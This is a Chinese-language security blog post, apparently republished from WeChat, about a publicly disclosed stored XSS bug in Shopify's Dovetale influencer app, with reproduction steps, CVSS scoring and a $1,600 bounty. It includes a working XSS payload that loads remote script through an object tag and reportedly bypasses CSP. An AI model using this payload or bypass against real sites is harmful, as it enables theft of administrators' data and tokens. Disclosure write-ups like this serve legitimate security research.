声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
背景介绍:
最新Shopify在HackerOne上对4个月前的一处存储型XSS漏洞进行了公开披露,让我们一起来看看这个漏洞吧。
漏洞概要:
Dovetale 是 Shopify 的一个影响力管理平台,用于管理和扩展‘网红’营销,有影响力的人可以申请成为品牌大使,如果恶意创建者在名字、姓氏等中使用 XSS Payloads,数据将被存储并呈现给 Dovetale 应用程序区域内的品牌管理员。当管理员批准应用程序时,HTML-/JavaScript 最终被触发。
被用于测试的网站URL是:
19kun-24.myshopify.com
漏洞复现:
先决条件:需要“真实”订阅 Shopify 计划(例如基本计划)才能获得相关权限,仅仅创建开发商店在某种程度上是不够的。
1、(受害者)为其商店安装 Dovetale 应用程序,创建 Dovetale 帐户并将其链接到特定商店。
2、(受害者)创建一个适当的申请页面并复制成为品牌大使的申请链接
3、(攻击者)在新的浏览器实例中打开链接并按照应用程序进行操作,例如,使用现有的 Instagram 帐户申请
4、(攻击者)现在是填写你个人数据的时候了,将 XSS Payloads用于你的姓氏栏,
<object type="text/x-scriptlet" data="https://xss.rocks/scriptlet.html"></object>
5、(攻击者)完成并提交申请,之后需要验证电子邮件地址
6、(受害人)此时应该已经收到申请,点击“批准”按钮
7、(受害者)现在可以创建欢迎电子邮件,由于编辑器的清理,XSS Payloads不会在这里触发
但是如果单击了“Next Welcome package”>“Next Review”,将再次显示电子邮件并执行 JavaScript 代码:
注意:页面的CSP已通过使用对象标记成功绕过,因为CSP并不会阻止这种情况。
漏洞危害:
-
在受害者的浏览器中执行JavaScript代码
-
泄露机密数据,也有可能窃取其他申请者的数据或CSRF-令牌等数据
-
通过HTML注入对网站进行破坏
-
仿冒
CVSS3.0 漏洞评分:
Base Score CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 5.4
Environment: Non-Core (Modified by CR:L/IR:L/AR:L) 4.2
Attack Complexity: L
-
Specific conditions or measurable effort to exploit?: No
Privileges Required: N
-
Requires privileged account (not self-registered)?: No
User Interaction: R
-
Requires victim to perform some action during exploit?: Yes
Scope: U
-
Can the attacker impact a separate service?: No
Confidentiality: L
-
How much data could be accessed?: Most or All
-
How much of Shopify is impacted?: Some
Integrity: L
-
How much data could be changed?: Most or All
-
How much of Shopify is impacted?: Some
Availability: N
-
Level of disruption to network service?: None
该报告在hackerone上的地址是:
https://hackerone.com/reports/1652046
Shopify 依据 CVSS3.0 计算,最终奖励白帽 kun_19 共计$1,600的赏金奖励。
====正文结束====
原文始发于微信公众号(骨哥说事):【$1600】Shopify最近披露的一处存储型XSS漏洞
